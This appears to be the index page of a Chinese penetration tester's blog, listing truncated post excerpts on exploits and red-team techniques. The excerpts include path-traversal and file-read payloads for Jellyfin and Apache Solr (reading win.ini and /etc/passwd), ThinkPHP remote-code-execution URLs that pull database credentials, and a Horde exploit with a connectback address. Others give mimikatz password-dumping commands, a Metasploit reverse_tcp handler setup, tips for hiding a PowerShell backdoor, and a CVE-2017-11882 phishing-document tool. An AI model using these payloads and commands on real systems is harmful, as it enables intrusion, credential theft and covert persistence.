自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

逗比大师的博客

一个网络安全从业人员

  • 博客(16)
  • 资源 (2)
  • 收藏
  • 关注

原创 捕获xx脚本分析

(1)详细说明近日我捕获到一个利用Apache2.4.49漏洞(CVE-2021-41773)传播xmrig-6.14.1-linux-static-x64挖矿脚本的最新样本。样本文件名为aaa,file命令判断为ASCII脚本。如下图所示:直接cat该文件(2)样本分析I. 该bash脚本经过混淆,将eval改为print,调试脚本第一遍运行得到bash -c "$(b...

2021-11-01 16:35:00 173

原创 Jellyfin任意文件读取漏洞(CVE-2021-21402)

FOFA语句:title="Jellyfin"可以通过访问http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/读取任意文件。POC:http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/strea...

2021-04-09 16:32:00 859

原创 Latrix注入漏洞

/latrix/inandout.phptxtaccesscode参数存在SQL注入漏洞

2021-04-09 16:16:00 107

原创 Apache Solr 存在任意文件读取

访问:http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd (db为存在的应用名)

2021-04-09 16:07:00 150

原创 php绕过分号(;)和尖括号(<>)转义

实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入<?php phpinfo();?>实际得到:\<?php phpinfo()\;?\>分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一个普通文本,不需要处理,第二个尖括号可以不...

2021-03-24 10:03:00 2242

原创 Thinkphp远程代码执行 payload汇总

Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwordhttp://url/to/thin...

2020-09-27 11:06:00 325

原创 截止9月20日,xx行动中已知漏洞

VMware Fusion cve-2020-3980权限提升Apache Cocoon security vulnerability cve-2020-11991Spring框架RFD(文件下载)CVE-2020-0618-SQLServer报表服务远程代码执行漏洞CVE-2020-7115-Aruba Clearpass远程代码执行漏洞CVE-2020-15148-Yii 2框架反...

2020-09-20 10:39:00 157

原创 CVE-2020-1472 域内提权

攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。影响版本Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Syste...

2020-09-16 05:52:00 76

原创 Horde Groupware Webmail Edition 远程命令执行

saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port>(+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 172.16.175.1:1337satur...

2020-09-13 21:18:00 243

原创 Apache Cocoon XML注入 [CVE-2020-11991]

受影响版本:Apache Cocoon <= 2.1.x程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。以下是apache社区官方提供利用方式:<!--?xml version="1.0" ?--> <!DOCTYPE replace [...

2020-09-13 21:15:00 205

原创 windows下hash抓取的几种方式

前提:在渗透测试过程中,对于windows系统的机器渗透需要注意hash的获取,其中hash分为LM-HASH与NTLM-HASH,在windows系统中,hash的默认存储位置为:C:\Windows\System32\config\SAM各种工具:mimikatzprivilege::debug sekurlsa::logonPasswordswcewce.ex...

2020-08-04 14:33:00 362

原创 msf+cobaltstrike联动(二):把cs中的机器spwan给msf

前提:CS已经获取到session,可以进入图形化管理机器,现在需要使用msf进行进一步渗透,需要msf的metepreter。 开启msfmsf设置监听msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload =&gt...

2020-08-04 14:30:00 323

原创 msf+cobaltstrike联动(一):把msf的session发给cobaltstrike

前提:MFS已经获取到session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。 cobaltstrike起一个beacon监听,如使用:windows/beacon_http/reverse_http 设置好host和port之后启动监听。MSF中使用use exploit/windows/local/payload_inject...

2020-08-04 14:25:00 601

原创 CS代理+proxychains+nmap进行内网扫描

前提:拿下边界机之后,进入内网,想用nmap怎么办? CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,要使用-Pn不使用ICMP_的ping确认主机存活...

2020-08-04 14:20:00 1724

原创 利用powershell隐藏执行后门

运行后门时,有些后门不能中断。双击运行这种后门会产生一个黑框。 一条命令就能使其在后台执行命令解释: start-process启动一个进程 -windowstyle窗口样式 hidden隐藏...

2020-08-04 14:17:00 628

原创 内网渗透

1.信息收集1.1.windows1.1.1用户操作query user #查看当前在线的用户whoami #查看当前用户net user #查看当前系统的用户net1 user #查看当前系统的用户net user /domain #查看当前域里面的用户net user administrator #查看当前用户的详细信息net localgroup #查看本地用户...

2020-08-04 14:15:00 124

CVE-2017-11882

CVE-2017-11882,用于创建钓鱼word,可以添加命令,用来反弹shell,可以用powershell

2018-12-09

跟兄弟连学PHP.azw3

跟兄弟连学PHP.azw3,kindle专用电子书;

2018-12-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除